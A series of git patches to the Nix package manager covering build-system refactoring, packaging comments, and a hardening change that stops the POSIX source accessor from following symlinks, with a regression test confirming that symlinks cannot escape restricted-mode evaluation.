-338,12 +343,11 @@ AC_LINK_IFELSE([ [AC_MSG_ERROR([librapidcheck is not found.])]) AC_LANG_POP(C++) -fi +]) # Look for nlohmann/json. PKG_CHECK_MODULES([NLOHMANN_JSON], [nlohmann_json >= 3.9]) - # documentation generation switch AC_ARG_ENABLE(doc-gen, AS_HELP_STRING([--disable-doc-gen],[disable documentation generation]), doc_generate=$enableval, doc_generate=yes) @@ -388,6 +392,8 @@ if test "$embedded_sandbox_shell" = yes; then AC_DEFINE(HAVE_EMBEDDED_SANDBOX_SHELL, 1, [Include the sandbox shell in the Nix binary.]) fi +]) + # Expand all variables in config.status. test "$prefix" = NONE && prefix=$ac_default_prefix From 7a7ad7c84b4dd37331a8f8889b02c94540522dbc Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sun, 3 Dec 2023 18:14:36 -0500 Subject: [PATCH 036/654] Remove uneeded file --- test-nix-versions.nix | 15 --------------- 1 file changed, 15 deletions(-) delete mode 100644 test-nix-versions.nix diff --git a/test-nix-versions.nix b/test-nix-versions.nix deleted file mode 100644 index bda4621a1..000000000 --- a/test-nix-versions.nix +++ /dev/null @@ -1,15 +0,0 @@ -{ lib -, fileset -, stdenv -, client -, daemon -}: - -stdenv.mkDerivation { - name = - "nix-tests" - + lib.optionalString - (lib.versionAtLeast daemon.version "2.4pre20211005" && - lib.versionAtLeast client.version "2.4pre20211005") - "-${client.version}-against-${daemon.version}"; -} From e275f0adfb6b3f360f10f5adcf140c17edc58cc6 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sun, 3 Dec 2023 18:16:07 -0500 Subject: [PATCH 037/654] Move `binary-tarball.nix` to scripts dir --- flake.nix | 2 +- binary-tarball.nix => scripts/binary-tarball.nix | 10 +++++----- 2 files changed, 6 insertions(+), 6 deletions(-) rename binary-tarball.nix => scripts/binary-tarball.nix (85%) diff --git a/flake.nix b/flake.nix index fab8c45be..5c6ad3bc7 100644 --- a/flake.nix +++ b/flake.nix @@ -139,7 +139,7 @@ doBuild = false; }; - binaryTarball = nix: pkgs: pkgs.callPackage ./binary-tarball.nix { + binaryTarball = nix: pkgs: pkgs.callPackage ./scripts/binary-tarball.nix { inherit nix; }; diff --git a/binary-tarball.nix b/scripts/binary-tarball.nix similarity index 85% rename from binary-tarball.nix rename to scripts/binary-tarball.nix index 0053abbca..32e811c94 100644 --- a/binary-tarball.nix +++ b/scripts/binary-tarball.nix @@ -21,18 +21,18 @@ in runCommand "nix-binary-tarball-${version}" env '' cp ${installerClosureInfo}/registration $TMPDIR/reginfo - cp ${./scripts/create-darwin-volume.sh} $TMPDIR/create-darwin-volume.sh - substitute ${./scripts/install-nix-from-closure.sh} $TMPDIR/install \ + cp ${./create-darwin-volume.sh} $TMPDIR/create-darwin-volume.sh + substitute ${./install-nix-from-closure.sh} $TMPDIR/install \ --subst-var-by nix ${nix} \ --subst-var-by cacert ${cacert} - substitute ${./scripts/install-darwin-multi-user.sh} $TMPDIR/install-darwin-multi-user.sh \ + substitute ${./install-darwin-multi-user.sh} $TMPDIR/install-darwin-multi-user.sh \ --subst-var-by nix ${nix} \ --subst-var-by cacert ${cacert} - substitute ${./scripts/install-systemd-multi-user.sh} $TMPDIR/install-systemd-multi-user.sh \ + substitute ${./install-systemd-multi-user.sh} $TMPDIR/install-systemd-multi-user.sh \ --subst-var-by nix ${nix} \ --subst-var-by cacert ${cacert} - substitute ${./scripts/install-multi-user.sh} $TMPDIR/install-multi-user \ + substitute ${./install-multi-user.sh} $TMPDIR/install-multi-user \ --subst-var-by nix ${nix} \ --subst-var-by cacert ${cacert} From 60fe4ddaa1801b37a044a2c96071d96739bd26c0 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sun, 3 Dec 2023 18:17:47 -0500 Subject: [PATCH 038/654] Expose `boehmgc-nix` in overlay --- flake.nix | 24 ++++++++++++------------ 1 file changed, 12 insertions(+), 12 deletions(-) diff --git a/flake.nix b/flake.nix index 5c6ad3bc7..78fc88bed 100644 --- a/flake.nix +++ b/flake.nix @@ -188,6 +188,17 @@ ++ [ "-DUSE_SSH=exec" ]; }); + boehmgc-nix = (final.boehmgc.override { + enableLargeConfig = true; + }).overrideAttrs(o: { + patches = (o.patches or []) ++ [ + ./boehmgc-coroutine-sp-fallback.diff + + # https://github.com/ivmai/bdwgc/pull/586 + ./boehmgc-traceable_allocator-public.diff + ]; + }); + nix = let officialRelease = false; @@ -196,25 +207,14 @@ then "" else "pre${builtins.substring 0 8 (self.lastModifiedDate or self.lastModified or "19700101")}_${self.shortRev or "dirty"}"; - boehmgc = (final.boehmgc.override { - enableLargeConfig = true; - }).overrideAttrs(o: { - patches = (o.patches or []) ++ [ - ./boehmgc-coroutine-sp-fallback.diff - - # https://github.com/ivmai/bdwgc/pull/586 - ./boehmgc-traceable_allocator-public.diff - ]; - }); - in final.callPackage ./package.nix { inherit - boehmgc fileset stdenv versionSuffix ; officialRelease = false; + boehmgc = final.boehmgc-nix; libgit2 = final.libgit2-nix; lowdown = final.lowdown-nix; busybox-sandbox-shell = final.busybox-sandbox-shell or final.default-busybox-sandbox-shell; From 77003a4f0c380929f18b71476b9e7f9cd4009458 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sun, 3 Dec 2023 18:29:15 -0500 Subject: [PATCH 039/654] Factor out the installer script --- flake.nix | 43 +++++++++++-------------------------------- scripts/installer.nix | 35 +++++++++++++++++++++++++++++++++++ 2 files changed, 46 insertions(+), 32 deletions(-) create mode 100644 scripts/installer.nix diff --git a/flake.nix b/flake.nix index 78fc88bed..ecd0381a2 100644 --- a/flake.nix +++ b/flake.nix @@ -89,38 +89,17 @@ }); installScriptFor = systems: - with nixpkgsFor.x86_64-linux.native; - runCommand "installer-script" - { buildInputs = [ nix ]; - } - '' - mkdir -p $out/nix-support - - # Converts /nix/store/50p3qk8k...-nix-2.4pre20201102_550e11f/bin/nix to 50p3qk8k.../bin/nix. - tarballPath() { - # Remove the store prefix - local path=''${1#${builtins.storeDir}/} - # Get the path relative to the derivation root - local rest=''${path#*/} - # Get the derivation hash - local drvHash=''${path%%-*} - echo "$drvHash/$rest" - } - - substitute ${./scripts/install.in} $out/install \ - ${pkgs.lib.concatMapStrings - (system: let - tarball = if builtins.elem system crossSystems then self.hydraJobs.binaryTarballCross.x86_64-linux.${system} else self.hydraJobs.binaryTarball.${system}; - in '' \ - --replace '@tarballHash_${system}@' $(nix --experimental-features nix-command hash-file --base16 --type sha256 ${tarball}/*.tar.xz) \ - --replace '@tarballPath_${system}@' $(tarballPath ${tarball}/*.tar.xz) \ - '' - ) - systems - } --replace '@nixVersion@' ${version} - - echo "file installer $out/install" >> $out/nix-support/hydra-build-products - ''; + nixpkgsFor.x86_64-linux.native.callPackage ./scripts/installer.nix { + systemTarballPairs = map + (system: { + inherit system; + tarball = + if builtins.elem system crossSystems + then self.hydraJobs.binaryTarballCross.x86_64-linux.${system} + else self.hydraJobs.binaryTarball.${system}; + }) + systems; + }; testNixVersions = pkgs: client: daemon: pkgs.callPackage ./package.nix { diff --git a/scripts/installer.nix b/scripts/installer.nix new file mode 100644 index 000000000..35d2d7fe6 --- /dev/null +++ b/scripts/installer.nix @@ -0,0 +1,35 @@ +{ lib +, runCommand +, nix +, systemTarballPairs +}: + +runCommand "installer-script" { + buildInputs = [ nix ]; +} '' + mkdir -p $out/nix-support + + # Converts /nix/store/50p3qk8k...-nix-2.4pre20201102_550e11f/bin/nix to 50p3qk8k.../bin/nix. + tarballPath() { + # Remove the store prefix + local path=''${1#${builtins.storeDir}/} + # Get the path relative to the derivation root + local rest=''${path#*/} + # Get the derivation hash + local drvHash=''${path%%-*} + echo "$drvHash/$rest" + } + + substitute ${./install.in} $out/install \ + ${lib.concatMapStrings + ({ system, tarball }: + '' \ + --replace '@tarballHash_${system}@' $(nix --experimental-features nix-command hash-file --base16 --type sha256 ${tarball}/*.tar.xz) \ + --replace '@tarballPath_${system}@' $(tarballPath ${tarball}/*.tar.xz) \ + '' + ) + systemTarballPairs + } --replace '@nixVersion@' ${nix.version} + + echo "file installer $out/install" >> $out/nix-support/hydra-build-products +'' From f58615518c1284d4dbe4655246d4d5d6e9b2befe Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sun, 3 Dec 2023 18:39:33 -0500 Subject: [PATCH 040/654] Add documenting comments to `package.nix` --- package.nix | 22 +++++++++++++++++++++- 1 file changed, 21 insertions(+), 1 deletion(-) diff --git a/package.nix b/package.nix index 0758f989e..7f0d78b5c 100644 --- a/package.nix +++ b/package.nix @@ -43,22 +43,37 @@ #: # This probably seems like too many degrees of freedom, but it # faithfully reflects how the underlying configure + make build system -# work. The top-level flake.nix will choose useful combinations. +# work. The top-level flake.nix will choose useful combinations of these +# options to CI. , pname ? "nix" , versionSuffix ? "" , officialRelease ? false +# Whether to build Nix. Useful to skip for tasks like (a) just +# generating API docs or (b) testing existing pre-built versions of Nix , doBuild ? true + +# Run the unit tests as part of the build. See `installUnitTests` for an +# alternative to this. , doCheck ? __forDefaults.canRunInstalled + +# Run the functional tests as part of the build. , doInstallCheck ? test-client != null || __forDefaults.canRunInstalled +# Check test coverage of Nix. Probably want to use with with at least +# one of `doCHeck` or `doInstallCheck` enabled. , withCoverageChecks ? false # Whether to build the regular manual , enableManual ? __forDefaults.canRunInstalled + +# Whether to compile `rl-next.md`, the release notes for the next +# not-yet-released version of Nix in the manul, from the individual +# change log entries in the directory. , buildUnreleasedNotes ? false + # Whether to build the internal API docs, can be done separately from # everything else. , enableInternalAPIDocs ? false @@ -350,8 +365,13 @@ in { platforms = lib.platforms.unix; mainProgram = "nix"; broken = !(lib.all (a: a) [ + # We cannot run or install unit tests if we don't build them or + # Nix proper (which they depend on). (installUnitTests -> doBuild) (doCheck -> doBuild) + # We have to build the manual to build unreleased notes, as those + # are part of the manual + (buildUnreleasedNotes -> enableManual) ]); }; From a5a45e64e18de3eb827ca83c7356dc8a088be125 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sun, 3 Dec 2023 18:45:15 -0500 Subject: [PATCH 041/654] Don't expose file sets anymore --- package.nix | 2 -- 1 file changed, 2 deletions(-) diff --git a/package.nix b/package.nix index 7f0d78b5c..52050496c 100644 --- a/package.nix +++ b/package.nix @@ -354,8 +354,6 @@ in { hardeningDisable = lib.optional stdenv.hostPlatform.isStatic "pie"; passthru = { - inherit filesets; - perl-bindings = callPackage ./perl { inherit fileset stdenv; }; From 7e2b1cce6abec48f85c8bc056da0ca991dfe7b32 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sun, 3 Dec 2023 18:47:54 -0500 Subject: [PATCH 042/654] Slap on `perl-bindings` in the caller The Perl bindings are not part of Nix, but a downstream package, so they don't belong in `package.nix`. They don't really belong as an attribute on `nix` either, but we can just leave that interface as is for now. --- flake.nix | 9 +++++++++ package.nix | 7 ------- 2 files changed, 9 insertions(+), 7 deletions(-) diff --git a/flake.nix b/flake.nix index ecd0381a2..c92f717d5 100644 --- a/flake.nix +++ b/flake.nix @@ -197,7 +197,16 @@ libgit2 = final.libgit2-nix; lowdown = final.lowdown-nix; busybox-sandbox-shell = final.busybox-sandbox-shell or final.default-busybox-sandbox-shell; + } // { + # this is a proper separate downstream package, but put + # here also for back compat reasons. + perl-bindings = final.nix-perl-bindings; }; + + nix-perl-bindings = final.callPackage ./perl { + inherit fileset stdenv; + }; + }; in { diff --git a/package.nix b/package.nix index 52050496c..f6219e58a 100644 --- a/package.nix +++ b/package.nix @@ -1,5 +1,4 @@ { lib -, callPackage , stdenv , releaseTools , autoconf-archive @@ -353,12 +352,6 @@ in { hardeningDisable = lib.optional stdenv.hostPlatform.isStatic "pie"; - passthru = { - perl-bindings = callPackage ./perl { - inherit fileset stdenv; - }; - }; - meta = { platforms = lib.platforms.unix; mainProgram = "nix"; From 6e0656c66c1052bcbab204140c6b3dec81f3ab15 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sun, 3 Dec 2023 18:53:05 -0500 Subject: [PATCH 043/654] Add another configure flag assertion --- package.nix | 3 +++ 1 file changed, 3 insertions(+) diff --git a/package.nix b/package.nix index f6219e58a..42f98a48c 100644 --- a/package.nix +++ b/package.nix @@ -363,6 +363,9 @@ in { # We have to build the manual to build unreleased notes, as those # are part of the manual (buildUnreleasedNotes -> enableManual) + # The build process for the manual currently requires extracting + # data from the Nix executable we are trying to document. + (enableManual -> doBuild) ]); }; From 14c26d642ebcff3fe45c8eb6719a213c63143fb3 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sun, 3 Dec 2023 18:57:16 -0500 Subject: [PATCH 044/654] Clean up two comments --- package.nix | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/package.nix b/package.nix index 42f98a48c..96b9111f8 100644 --- a/package.nix +++ b/package.nix @@ -329,10 +329,10 @@ in { doInstallCheck = attrs.doInstallCheck; installCheckFlags = "sysconfdir=$(out)/etc"; - # work around buggy detection in stdenv + # Work around buggy detection in stdenv. installCheckTarget = "installcheck"; - # work around weird bug where it doesn't want to do anything + # Work around weird bug where it doesn't think there is a Makefile. installCheckPhase = if (!doBuild && doInstallCheck) then '' mkdir -p src/nix-channel make installcheck -j$NIX_BUILD_CORES -l$NIX_BUILD_CORES From 345f79d01676680f2d4ef8803790896a190c855b Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Tue, 5 Dec 2023 15:14:28 +0100 Subject: [PATCH 045/654] Check that we can't follow symlinks outside of the allowed paths --- tests/functional/restricted.sh | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/tests/functional/restricted.sh b/tests/functional/restricted.sh index b8deceacc..cb83c34b1 100644 --- a/tests/functional/restricted.sh +++ b/tests/functional/restricted.sh @@ -39,6 +39,15 @@ nix-instantiate --eval --restrict-eval $TEST_ROOT/restricted.nix -I $TEST_ROOT - [[ $(nix eval --raw --impure --restrict-eval -I . --expr 'builtins.readFile "${import ./simple.nix}/hello"') == 'Hello World!' ]] +# Check that we can't follow a symlink outside of the allowed paths. +mkdir -p $TEST_ROOT/tunnel.d +ln -sfn .. $TEST_ROOT/tunnel.d/tunnel +echo foo > $TEST_ROOT/bar + +expectStderr 1 nix-instantiate --restrict-eval --eval -E "let __nixPath = [ { prefix = \"foo\"; path = $TEST_ROOT/tunnel.d; } ]; in builtins.readFile " -I $TEST_ROOT/tunnel.d | grepQuiet "forbidden in restricted mode" + +expectStderr 1 nix-instantiate --restrict-eval --eval -E "let __nixPath = [ { prefix = \"foo\"; path = $TEST_ROOT/tunnel.d; } ]; in builtins.readDir " -I $TEST_ROOT/tunnel.d | grepQuiet "forbidden in restricted mode" + # Check whether we can leak symlink information through directory traversal. traverseDir="$(pwd)/restricted-traverse-me" ln -sfn "$(pwd)/restricted-secret" "$(pwd)/restricted-innocent" From 733333e87db391e4f832de65f0f49f60e50c45a4 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Fri, 1 Dec 2023 17:38:34 -0500 Subject: [PATCH 046/654] Including `config.h` also needs `$(buildprefix)` Per the instruction in the manual, we want to run configure in a different directory so that we can configure + build for multiple platforms. That means `config.h` will be in the build directory. This is just like `Makefile.config`, which already is used with `$(buildprefix)`. --- Makefile | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Makefile b/Makefile index eea297c89..41f14ac92 100644 --- a/Makefile +++ b/Makefile @@ -64,4 +64,4 @@ $(eval $(call include-sub-makefile, doc/manual/local.mk)) $(eval $(call include-sub-makefile, doc/internal-api/local.mk)) endif -GLOBAL_CXXFLAGS += -g -Wall -include config.h -std=c++2a -I src +GLOBAL_CXXFLAGS += -g -Wall -include $(buildprefix)config.h -std=c++2a -I src From 83c067c0fa0cc5a2dca440e5c986afe40b163802 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Tue, 5 Dec 2023 23:02:59 +0100 Subject: [PATCH 047/654] PosixSourceAccessor: Don't follow any symlinks All path components must not be symlinks now (so the user needs to call `resolveSymlinks()` when needed). --- src/libexpr/parser.y | 11 +++++----- src/libexpr/primops.cc | 30 ++++++++++++++-------------- src/libutil/posix-source-accessor.cc | 27 +++++++++++++++++++++---- src/libutil/posix-source-accessor.hh | 5 +++++ src/nix-env/nix-env.cc | 6 +++--- src/nix-env/user-env.cc | 2 +- tests/functional/restricted.sh | 7 +++++-- 7 files changed, 58 insertions(+), 30 deletions(-) diff --git a/src/libexpr/parser.y b/src/libexpr/parser.y index 58fc580fc..16ad8af2e 100644 --- a/src/libexpr/parser.y +++ b/src/libexpr/parser.y @@ -692,16 +692,17 @@ SourcePath resolveExprPath(SourcePath path) /* If `path' is a symlink, follow it. This is so that relative path references work. */ - while (true) { + while (!path.path.isRoot()) { // Basic cycle/depth limit to avoid infinite loops. if (++followCount >= maxFollow) throw Error("too many symbolic links encountered while traversing the path '%s'", path); - if (path.lstat().type != InputAccessor::tSymlink) break; - path = {path.accessor, CanonPath(path.readLink(), path.path.parent().value_or(CanonPath::root))}; + auto p = path.parent().resolveSymlinks() + path.baseName(); + if (p.lstat().type != InputAccessor::tSymlink) break; + path = {path.accessor, CanonPath(p.readLink(), path.path.parent().value_or(CanonPath::root))}; } /* If `path' refers to a directory, append `/default.nix'. */ - if (path.lstat().type == InputAccessor::tDirectory) + if (path.resolveSymlinks().lstat().type == InputAccessor::tDirectory) return path + "default.nix"; return path; @@ -716,7 +717,7 @@ Expr * EvalState::parseExprFromFile(const SourcePath & path) Expr * EvalState::parseExprFromFile(const SourcePath & path, std::shared_ptr & staticEnv) { - auto buffer = path.readFile(); + auto buffer = path.resolveSymlinks().readFile(); // readFile hopefully have left some extra space for terminators buffer.append("\0\0", 2); return parse(buffer.data(), buffer.size(), Pos::Origin(path), path.parent(), staticEnv); diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc index c442de986..f2d51f8f5 100644 --- a/src/libexpr/primops.cc +++ b/src/libexpr/primops.cc @@ -110,7 +110,7 @@ StringMap EvalState::realiseContext(const NixStringContext & context) return res; } -static SourcePath realisePath(EvalState & state, const PosIdx pos, Value & v) +static SourcePath realisePath(EvalState & state, const PosIdx pos, Value & v, bool resolveSymlinks = true) { NixStringContext context; @@ -120,9 +120,9 @@ static SourcePath realisePath(EvalState & state, const PosIdx pos, Value & v) if (!context.empty() && path.accessor == state.rootFS) { auto rewrites = state.realiseContext(context); auto realPath = state.toRealPath(rewriteStrings(path.path.abs(), rewrites), context); - return {path.accessor, CanonPath(realPath)}; - } else - return path; + path = {path.accessor, CanonPath(realPath)}; + } + return resolveSymlinks ? path.resolveSymlinks() : path; } catch (Error & e) { e.addTrace(state.positions[pos], "while realising the context of path '%s'", path); throw; @@ -162,7 +162,7 @@ static void mkOutputString( argument. */ static void import(EvalState & state, const PosIdx pos, Value & vPath, Value * vScope, Value & v) { - auto path = realisePath(state, pos, vPath); + auto path = realisePath(state, pos, vPath, false); auto path2 = path.path.abs(); // FIXME @@ -1525,16 +1525,16 @@ static RegisterPrimOp primop_storePath({ static void prim_pathExists(EvalState & state, const PosIdx pos, Value * * args, Value & v) { - auto & arg = *args[0]; - - auto path = realisePath(state, pos, arg); - - /* SourcePath doesn't know about trailing slash. */ - auto mustBeDir = arg.type() == nString - && (arg.string_view().ends_with("/") - || arg.string_view().ends_with("/.")); - try { + auto & arg = *args[0]; + + auto path = realisePath(state, pos, arg); + + /* SourcePath doesn't know about trailing slash. */ + auto mustBeDir = arg.type() == nString + && (arg.string_view().ends_with("/") + || arg.string_view().ends_with("/.")); + auto st = path.maybeLstat(); auto exists = st && (!mustBeDir || st->type == SourceAccessor::tDirectory); v.mkBool(exists); @@ -1771,7 +1771,7 @@ static std::string_view fileTypeToString(InputAccessor::Type type) static void prim_readFileType(EvalState & state, const PosIdx pos, Value * * args, Value & v) { - auto path = realisePath(state, pos, *args[0]); + auto path = realisePath(state, pos, *args[0], false); /* Retrieve the directory entry type and stringize it. */ v.mkString(fileTypeToString(path.lstat().type)); } diff --git a/src/libutil/posix-source-accessor.cc b/src/libutil/posix-source-accessor.cc index dc96f84e5..0601e6387 100644 --- a/src/libutil/posix-source-accessor.cc +++ b/src/libutil/posix-source-accessor.cc @@ -8,9 +8,9 @@ void PosixSourceAccessor::readFile( Sink & sink, std::function sizeCallback) { - // FIXME: add O_NOFOLLOW since symlinks should be resolved by the - // caller? - AutoCloseFD fd = open(path.c_str(), O_RDONLY | O_CLOEXEC); + assertNoSymlinks(path); + + AutoCloseFD fd = open(path.c_str(), O_RDONLY | O_CLOEXEC | O_NOFOLLOW); if (!fd) throw SysError("opening file '%1%'", path); @@ -42,14 +42,16 @@ void PosixSourceAccessor::readFile( bool PosixSourceAccessor::pathExists(const CanonPath & path) { + if (auto parent = path.parent()) assertNoSymlinks(*parent); return nix::pathExists(path.abs()); } std::optional PosixSourceAccessor::maybeLstat(const CanonPath & path) { + if (auto parent = path.parent()) assertNoSymlinks(*parent); struct stat st; if (::lstat(path.c_str(), &st)) { - if (errno == ENOENT) return std::nullopt; + if (errno == ENOENT || errno == ENOTDIR) return std::nullopt; throw SysError("getting status of '%s'", showPath(path)); } mtime = std::max(mtime, st.st_mtime); @@ -66,6 +68,7 @@ std::optional PosixSourceAccessor::maybeLstat(const CanonP SourceAccessor::DirEntries PosixSourceAccessor::readDirectory(const CanonPath & path) { + assertNoSymlinks(path); DirEntries res; for (auto & entry : nix::readDirectory(path.abs())) { std::optional type; @@ -81,6 +84,7 @@ SourceAccessor::DirEntries PosixSourceAccessor::readDirectory(const CanonPath & std::string PosixSourceAccessor::readLink(const CanonPath & path) { + if (auto parent = path.parent()) assertNoSymlinks(*parent); return nix::readLink(path.abs()); } @@ -89,4 +93,19 @@ std::optional PosixSourceAccessor::getPhysicalPath(const CanonPath & return path; } +void PosixSourceAccessor::assertNoSymlinks(CanonPath path) +{ + // FIXME: cache this since it potentially causes a lot of lstat calls. + while (!path.isRoot()) { + struct stat st; + if (::lstat(path.c_str(), &st)) { + if (errno != ENOENT) + throw SysError("getting status of '%s'", showPath(path)); + } + if (S_ISLNK(st.st_mode)) + throw Error("path '%s' is a symlink", showPath(path)); + path.pop(); + } +} + } diff --git a/src/libutil/posix-source-accessor.hh b/src/libutil/posix-source-accessor.hh index a45d96bf8..7189a40e5 100644 --- a/src/libutil/posix-source-accessor.hh +++ b/src/libutil/posix-source-accessor.hh @@ -29,6 +29,11 @@ struct PosixSourceAccessor : virtual SourceAccessor std::string readLink(const CanonPath & path) override; std::optional getPhysicalPath(const CanonPath & path) override; + + /** + * Throw an error if `path` or any of its ancestors are symlinks. + */ + void assertNoSymlinks(CanonPath path); }; } diff --git a/src/nix-env/nix-env.cc b/src/nix-env/nix-env.cc index 86126c7ad..e2bbd9775 100644 --- a/src/nix-env/nix-env.cc +++ b/src/nix-env/nix-env.cc @@ -97,7 +97,7 @@ static bool isNixExpr(const SourcePath & path, struct InputAccessor::Stat & st) { return st.type == InputAccessor::tRegular - || (st.type == InputAccessor::tDirectory && (path + "default.nix").pathExists()); + || (st.type == InputAccessor::tDirectory && (path + "default.nix").resolveSymlinks().pathExists()); } @@ -116,11 +116,11 @@ static void getAllExprs(EvalState & state, are implemented using profiles). */ if (i == "manifest.nix") continue; - SourcePath path2 = path + i; + auto path2 = (path + i).resolveSymlinks(); InputAccessor::Stat st; try { - st = path2.resolveSymlinks().lstat(); + st = path2.lstat(); } catch (Error &) { continue; // ignore dangling symlinks in ~/.nix-defexpr } diff --git a/src/nix-env/user-env.cc b/src/nix-env/user-env.cc index 250224e7d..34f6bd005 100644 --- a/src/nix-env/user-env.cc +++ b/src/nix-env/user-env.cc @@ -21,7 +21,7 @@ DrvInfos queryInstalled(EvalState & state, const Path & userEnv) auto manifestFile = userEnv + "/manifest.nix"; if (pathExists(manifestFile)) { Value v; - state.evalFile(state.rootPath(CanonPath(manifestFile)), v); + state.evalFile(state.rootPath(CanonPath(manifestFile)).resolveSymlinks(), v); Bindings & bindings(*state.allocBindings(0)); getDerivations(state, v, "", bindings, elems, false); } diff --git a/tests/functional/restricted.sh b/tests/functional/restricted.sh index cb83c34b1..2d6ab964b 100644 --- a/tests/functional/restricted.sh +++ b/tests/functional/restricted.sh @@ -40,13 +40,16 @@ nix-instantiate --eval --restrict-eval $TEST_ROOT/restricted.nix -I $TEST_ROOT - [[ $(nix eval --raw --impure --restrict-eval -I . --expr 'builtins.readFile "${import ./simple.nix}/hello"') == 'Hello World!' ]] # Check that we can't follow a symlink outside of the allowed paths. -mkdir -p $TEST_ROOT/tunnel.d +mkdir -p $TEST_ROOT/tunnel.d $TEST_ROOT/foo2 ln -sfn .. $TEST_ROOT/tunnel.d/tunnel echo foo > $TEST_ROOT/bar expectStderr 1 nix-instantiate --restrict-eval --eval -E "let __nixPath = [ { prefix = \"foo\"; path = $TEST_ROOT/tunnel.d; } ]; in builtins.readFile " -I $TEST_ROOT/tunnel.d | grepQuiet "forbidden in restricted mode" -expectStderr 1 nix-instantiate --restrict-eval --eval -E "let __nixPath = [ { prefix = \"foo\"; path = $TEST_ROOT/tunnel.d; } ]; in builtins.readDir " -I $TEST_ROOT/tunnel.d | grepQuiet "forbidden in restricted mode" +expectStderr 1 nix-instantiate --restrict-eval --eval -E "let __nixPath = [ { prefix = \"foo\"; path = $TEST_ROOT/tunnel.d; } ]; in builtins.readDir " -I $TEST_ROOT/tunnel.d | grepQuiet "forbidden in restricted mode" + +# Reading the parents of allowed paths should show only the ancestors of the allowed paths. +[[ $(nix-instantiate --restrict-eval --eval -E "let __nixPath = [ { prefix = \"foo\"; path = $TEST_ROOT/tunnel.d; } ]; in builtins.readDir " -I $TEST_ROOT/tunnel.d) == '{ "tunnel.d" = "directory"; }' ]] # Check whether we can leak symlink information through directory traversal. traverseDir="$(pwd)/restricted-traverse-me" From b23273f6a29c725646b3523b1c35a0ae4a84ef61 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Tue, 5 Dec 2023 18:10:37 -0500 Subject: [PATCH 048/654] Add missing `-pthread` for test support libraries This is good in general (see how the other libraries also have long had it, since 49fe9592a47e7819179c2de4fd6068e897e944c7) but in particular needed to fix the NetBSD build. --- tests/unit/libexpr-support/local.mk | 2 +- tests/unit/libstore-support/local.mk | 2 +- tests/unit/libutil-support/local.mk | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/tests/unit/libexpr-support/local.mk b/tests/unit/libexpr-support/local.mk index 28e87b8f2..12a76206a 100644 --- a/tests/unit/libexpr-support/local.mk +++ b/tests/unit/libexpr-support/local.mk @@ -20,4 +20,4 @@ libexpr-test-support_LIBS = \ libstore-test-support libutil-test-support \ libexpr libstore libutil -libexpr-test-support_LDFLAGS := -lrapidcheck +libexpr-test-support_LDFLAGS := -pthread -lrapidcheck diff --git a/tests/unit/libstore-support/local.mk b/tests/unit/libstore-support/local.mk index d5d657c91..ff075c96a 100644 --- a/tests/unit/libstore-support/local.mk +++ b/tests/unit/libstore-support/local.mk @@ -18,4 +18,4 @@ libstore-test-support_LIBS = \ libutil-test-support \ libstore libutil -libstore-test-support_LDFLAGS := -lrapidcheck +libstore-test-support_LDFLAGS := -pthread -lrapidcheck diff --git a/tests/unit/libutil-support/local.mk b/tests/unit/libutil-support/local.mk index 43a1551e5..2ee2cdb6c 100644 --- a/tests/unit/libutil-support/local.mk +++ b/tests/unit/libutil-support/local.mk @@ -16,4 +16,4 @@ libutil-test-support_CXXFLAGS += $(libutil-tests_EXTRA_INCLUDES) libutil-test-support_LIBS = libutil -libutil-test-support_LDFLAGS := -lrapidcheck +libutil-test-support_LDFLAGS := -pthread -lrapidcheck From 504e4fc4576dc6a4cd5c083a3bf7b80dfb0ca220 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Wed, 6 Dec 2023 13:45:59 +0100 Subject: [PATCH 049/654] CanonPath: Support std::hash --- src/libfetchers/git-utils.cc | 2 +- src/libutil/canon-path.hh | 11 +++++++++++ 2 files changed, 12 insertions(+), 1 deletion(-) diff --git a/src/libfetchers/git-utils.cc b/src/libfetchers/git-utils.cc index 19eae0e1d..5f2a7a8bc 100644 --- a/src/libfetchers/git-utils.cc +++ b/src/libfetchers/git-utils.cc @@ -554,7 +554,7 @@ struct GitInputAccessor : InputAccessor return toHash(*git_tree_entry_id(entry)); } - std::map lookupCache; + std::unordered_map lookupCache; /* Recursively look up 'path' relative to the root. */ git_tree_entry * lookup(const CanonPath & path) diff --git a/src/libutil/canon-path.hh b/src/libutil/canon-path.hh index 6d0519f4f..6aff4ec0d 100644 --- a/src/libutil/canon-path.hh +++ b/src/libutil/canon-path.hh @@ -205,8 +205,19 @@ public: * `CanonPath(this.makeRelative(x), this) == path`. */ std::string makeRelative(const CanonPath & path) const; + + friend class std::hash; }; std::ostream & operator << (std::ostream & stream, const CanonPath & path); } + +template<> +struct std::hash +{ + std::size_t operator ()(const nix::CanonPath & s) const noexcept + { + return std::hash{}(s.path); + } +}; From 57246c4c3802920e6167fd540dae2a0abca97f15 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Wed, 6 Dec 2023 13:55:07 +0100 Subject: [PATCH 050/654] PosixSourceAccessor: Cache lstat() calls Since we're doing a lot of them in assertNoSymlinks(). --- src/libutil/posix-source-accessor.cc | 56 +++++++++++++++++++--------- src/libutil/posix-source-accessor.hh | 4 ++ 2 files changed, 42 insertions(+), 18 deletions(-) diff --git a/src/libutil/posix-source-accessor.cc b/src/libutil/posix-source-accessor.cc index 0601e6387..15ff76e59 100644 --- a/src/libutil/posix-source-accessor.cc +++ b/src/libutil/posix-source-accessor.cc @@ -1,5 +1,8 @@ #include "posix-source-accessor.hh" #include "signals.hh" +#include "sync.hh" + +#include namespace nix { @@ -46,23 +49,45 @@ bool PosixSourceAccessor::pathExists(const CanonPath & path) return nix::pathExists(path.abs()); } 